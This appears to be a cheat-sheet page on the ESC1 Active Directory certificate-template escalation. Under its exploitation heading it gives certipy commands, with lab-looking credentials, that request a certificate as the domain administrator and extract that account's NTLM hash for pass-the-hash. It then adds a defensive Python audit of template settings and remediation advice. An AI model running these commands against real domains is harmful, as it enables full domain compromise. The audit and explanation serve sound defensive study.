ESC1

ABOUT

ESC1 (from ESCalate) allows any domain user to impersonate a Domain Admin or any other user: the user requests a certificate "as them" from a misconfigured template and then authenticates with that certificate.

EXPLOITATION

Request Cert as Admin

certipy req -u 'Solomon.Reed@militech.local' -p 'SuperAgent12' -dc-ip 13.13.13.13 -target 13.13.13.13 -ca militech-DC-CA -template UserAuthentication -upn administrator@militech.local -debug

Auth as Admin

certipy auth -pfx administrator.pfx -dc-ip 13.13.13.13

The output includes the administrator's NTLM hash, which can then be used for pass-the-hash (PTH).
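As an added example (not part of the original page), a defender-side audit that flags the template settings ESC1 depends on: an enrollee-supplied subject, an EKU that permits client authentication, no manager approval or signature requirement, and Enroll rights for low-privileged principals. The attribute names are the real AD CS template attributes; the template records and the `enroll_principals` field are constructed simplifications.

```python
# Added example, not from the original page: a defender-side check that flags
# certificate templates carrying the ESC1 combination of settings. Attribute
# names follow the AD CS template schema; the sample templates are constructed.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {                                   # EKU OIDs usable for domain authentication
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose Enroll right means effectively any domain user can enroll
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_findings(template):
    """List the ESC1 conditions a template meets; all four together is ESC1."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject: requester picks the UPN")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list also permits authentication
        findings.append("certificate is valid for client authentication")
    if not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS) \
            and template["msPKI-RA-Signature"] == 0:
        findings.append("no manager approval or authorized signature required")
    if LOW_PRIV_PRINCIPALS & set(template["enroll_principals"]):
        findings.append("low-privileged principals hold the Enroll right")
    return findings

def is_esc1(template):
    return len(esc1_findings(template)) == 4

# Constructed sample data. 'enroll_principals' is a simplification: in AD the
# Enroll right is an ACE for the Certificate-Enrollment extended right in the
# template's nTSecurityDescriptor, which a real audit would have to parse.
TEMPLATES = [
    {"name": "UserAuthentication", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000,  # subject built from AD
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "msPKI-Enrollment-Flag": 0,
     "msPKI-RA-Signature": 0, "enroll_principals": ["Domain Users"]},
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_findings(t))
```

Fixing any one of the four conditions (most commonly clearing the enrollee-supplies-subject flag or requiring manager approval) takes a template out of the ESC1 category.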

RESOURCES
